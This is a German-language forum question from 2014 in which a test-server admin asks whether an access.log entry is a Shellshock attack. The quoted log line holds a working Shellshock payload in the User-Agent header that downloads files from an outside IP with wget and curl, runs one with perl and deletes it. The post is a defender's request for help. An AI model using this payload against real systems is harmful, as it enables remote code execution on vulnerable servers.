Ist dies ein Angriff oder etwas, worüber man sich Sorgen machen muss? Shellshock?

Sah dies in der access.log auf meinem Testserver :

> 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
> http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ;
> perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

Keine der Adressen bezieht sich auf mich oder unseren IP-Bereich (oder irgendetwas anderes, was das betrifft)Dachte sofort an die Shellshock-Sicherheitsfehler
/"bashdoor".

Es sieht tatsächlich so aus, als hätte jemand versucht, "etwas" auf den Server herunterzuladen, dann dieses "etwas" ausgeführt und danach "etwas" mit curl gelöscht.

Dies ist ein reiner Testserver, es wird kein Schaden angerichtet (==kein Schaden kann angerichtet werden außer Neuinstallation) - aber das Timing ist sehr interessant. Habe so etwas bisher noch nicht gesehen, soweit ich mich erinnere.

Sollte ich mir Sorgen machen, z.B. "interessiert" sein? Hat jemand eine Ahnung, was das ist?

  • Wir wissen nicht einmal, ob der Exploit erfolgreich war, oder?

OriginalAutor davidkonrad | 2014-09-29

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.